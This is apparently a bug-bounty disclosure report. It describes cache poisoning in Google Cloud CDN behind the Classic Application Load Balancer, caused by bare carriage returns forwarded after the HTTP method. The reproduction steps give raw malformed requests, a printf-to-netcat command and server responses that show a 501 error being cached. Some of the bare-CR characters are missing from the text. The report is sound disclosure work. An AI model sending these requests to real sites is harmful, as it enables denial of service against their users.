Summary:
Google Cloud CDN, with the classic app LB, is vulnerable to cache poisoning when used with certain origin servers (inc. Lighttpd, Tornado, and FastHTTP) due to forwarding bare CRs after methods.
Program:
Google VRP
URL:
https://cloud.google.com/cdn
Vulnerability type:
Caching
Details
The Bug in the Classic App LB
Google Cloud Classic Application Load Balancer accepts and forwards carriage returns (i.e.,
\r
, aka "bare CR") in the whitespace after the HTTP method. For example, a classic application LB, upon receiving request #1, would emit something like request #2:
Request #1 (incoming to the LB)
GET\r / HTTP/1.1\r\n
Host: whatever\r\n
\r\n
Request #2 (outgoing from the LB)
X-Cloud-Trace-Context: <some big number>\r\n
Via: 1.1 google\r\n
X-Forwarded-For: <some IPs>\r\n
X-Forwarded-Proto: http\r\n
Connection: Keep-Alive\r\n
CDN-Loop: google\r\n
The HTTP RFCs are clear that this behavior is incorrect:
A sender MUST NOT generate a bare CR (a CR character not immediately followed by LF) within any protocol elements other than the content. A recipient of such a bare CR MUST consider that element to be invalid or replace each bare CR with SP before processing the element or forwarding the message.
In other words, a recipient of a bare CR in this location has two choices:
Replace it with a space
Reject the message
The classic application LB does neither, and instead forwards the bare CR as-is. Thus, for caching purposes, a method of
GET\r
is equivalent to
GET
.
Mechanism For Exploiting the Bug
This bug can be used to poison the Google Cloud CDN cache when the following are true:
Negative caching is enabled.
The origin server behind the CDN does not respond 400 to requestts with methods suffixed with
The origin server behind the CDN considers methods suffixed with
as distinct from their un-suffixed counterparts.
It turns out that there are many such HTTP servers. Here are some examples:
Tornado
Lighttpd
CherryPy
Libsoup
Libevent
How to Exploit the Bug
To reproduce the cache poisoning attack for yourself, do the following:
Configure a Google Cloud Classic Application Load Balancer, and enable Cloud CDN with negative caching.
Point the LB at port 80 on a machine you control with a publicly-routable IP.
Start an instance of Lighttpd on that machine on port 80, with the server root set to
/var/www/html
. (This is the server root in the default configuration file. This step should thus be as simple as
apt -y install lighttpd && lighttpd -f /etc/lighttpd/lighttpd.conf
)
Make a file called
index.html
in the server root, and put some data in it:
echo 'Hello world!' > /var/www/html/index.html
Send the following request to the LB:
GET /index.html HTTP/1.1\r\n
Host: <your host name>\r\n
Observe that the server responds with the content of the file:
HTTP/1.1 200 OK\r\n
Content-Type: text/html\r\n
ETag: "1820227750"\r\n
Last-Modified: Thu, 06 Jun 2024 23:52:45 GMT\r\n
Content-Length: 13\r\n
Accept-Ranges: bytes\r\n
Date: Fri, 07 Jun 2024 00:28:15 GMT\r\n
Server: lighttpd/1.4.74\r\n
Hello world!
Send the following request to the LB (this should poison the cache):
GET\r /index.html HTTP/1.1\r\n
Observe that the server responds 501, indicating that Lighttpd doesn't support the
method:
HTTP/1.1 501 Not Implemented\r\n
Content-Length: 170\r\n
Date: Fri, 07 Jun 2024 00:28:25 GMT\r\n
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>501 Not Implemented</title>
</head>
<body>
<h1>501 Not Implemented</h1>
</body>
</html>
Try sending the first request again, and observe that it now also elicits a 501 response:
printf 'GET /index.html HTTP/1.1\r\nHost: whatever\r\n\r\n' | nc <your LB IP> <your LB port>
Date: Fri, 07 Jun 2024 00:31:54 GMT\r\n
Age: 4\r\n
Thus, the cache has been poisoned.
Attack scenario
An attacker can use this vulnerability to deny service to sites that use negative caching on the classic app. LB, paired with any of the servers listed earlier, such as Lighttpd.